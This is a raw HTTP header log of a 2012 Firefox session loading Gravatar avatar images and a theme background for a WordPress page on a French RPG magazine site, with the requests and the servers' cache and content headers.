Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E7)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995954
Content-Length: 5744
GET /avatar/4616f35efcf528bd5cb3c74812acbd01?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/4616f35efcf528bd5cb3c74812acbd01?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E7)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119342
Content-Length: 5859
GET /avatar/1892a96ee6d531f082606b31ebd8b52e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/1892a96ee6d531f082606b31ebd8b52e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995970
Content-Length: 4068
GET /avatar/bc6aac2d96af574a7c6e93fbe9d95205?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/bc6aac2d96af574a7c6e93fbe9d95205?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1770634975
Content-Length: 5862
GET /avatar/94473f25c998eb99107cbe17b9c91d05?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/94473f25c998eb99107cbe17b9c91d05?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826818124
Content-Length: 4171
GET /avatar/620ae2491be910a7b041abca4893e4a4?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/620ae2491be910a7b041abca4893e4a4?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4264586811
Content-Length: 4789
GET /avatar/6599c2f5411fc9db5132a553d4c155e3?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6599c2f5411fc9db5132a553d4c155e3?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237984
Content-Length: 5153
GET /avatar/04c919cd5866f684f688a4f0d561e14b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/04c919cd5866f684f688a4f0d561e14b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163505
Content-Length: 4038
GET /avatar/48381fbc2244fcaa4f621aa3c3dfc2f1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/48381fbc2244fcaa4f621aa3c3dfc2f1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163503
Content-Length: 4601
GET /avatar/703f311e6881590887f20d226a391026?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/703f311e6881590887f20d226a391026?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3552575998
Content-Length: 5726
GET /site/wp-content/themes/eGamer/images/bg2.jpg HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Thu, 12 Feb 2009 18:33:32 GMT
Etag: &quot;1838419-c9f9-462bcf514d700&quot;
Accept-Ranges: bytes
Content-Length: 51705
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /avatar/b11f6fbfadff2835087d2d8874261733?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b11f6fbfadff2835087d2d8874261733?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FD)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2628432592
Content-Length: 4035
GET /avatar/0fd5d15f989379e7e9964b48da520adf?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/0fd5d15f989379e7e9964b48da520adf?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F9)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099592
Content-Length: 3842
GET /avatar/941b8b98148c8c786187368a322dcda9?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/941b8b98148c8c786187368a322dcda9?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718551
Content-Length: 4923
GET /avatar/4262f10f46da9dc735d4d1538022dc08?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/4262f10f46da9dc735d4d1538022dc08?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331804
Content-Length: 5923
GET /avatar/cc3d30c47ff44be2aeaa6c2c72e5a77b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/cc3d30c47ff44be2aeaa6c2c72e5a77b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331803
Content-Length: 4757
GET /avatar/05889e64bcd080e85d19ef40940420e4?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/05889e64bcd080e85d19ef40940420e4?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46ED)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237906
Content-Length: 5696
GET /avatar/85a64d8ad2fe3f2011509c3201c0ef37?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/85a64d8ad2fe3f2011509c3201c0ef37?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119411
Content-Length: 6042
GET /avatar/ed26a6cd652cce3692415c489c8c1b15?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/ed26a6cd652cce3692415c489c8c1b15?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E6)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460273018
Content-Length: 6075
GET /avatar/d873043826d153515b43b1a9e29796a2?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/d873043826d153515b43b1a9e29796a2?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FC)
Source-Age: 1500
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718569 251010956
Content-Length: 4560
GET /avatar/1d1628a7d5c1256be189a357a4432d41?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/1d1628a7d5c1256be189a357a4432d41?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099617
Content-Length: 6326
GET /avatar/6d141ad13ac5b6d8f89bbe49233573ac?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6d141ad13ac5b6d8f89bbe49233573ac?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1632827266
Content-Length: 4273
GET /avatar/cb7f3673962253c53e1b9e39bdd5351e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/cb7f3673962253c53e1b9e39bdd5351e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331814
Content-Length: 5084
GET /avatar/895c401222c7735ef251f7c98a6755c8?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/895c401222c7735ef251f7c98a6755c8?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1460273038
Content-Length: 6945
GET /avatar/4bdb938e1b13eb034391d26029bdb338?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/4bdb938e1b13eb034391d26029bdb338?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3552576062
Content-Length: 5883
GET /avatar/e5c067f8bb480f766f330765e8e86954?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/e5c067f8bb480f766f330765e8e86954?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3462922812
Content-Length: 4484
GET /avatar/bd4ada61369f2afbabd6bd6310f64ca6?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/bd4ada61369f2afbabd6bd6310f64ca6?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:35 GMT
Expires: Tue, 06 Nov 2012 11:55:35 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3405940151
Content-Length: 5071
GET /avatar/1d79691a61454abd5f629a1bc09c1111?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/1d79691a61454abd5f629a1bc09c1111?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
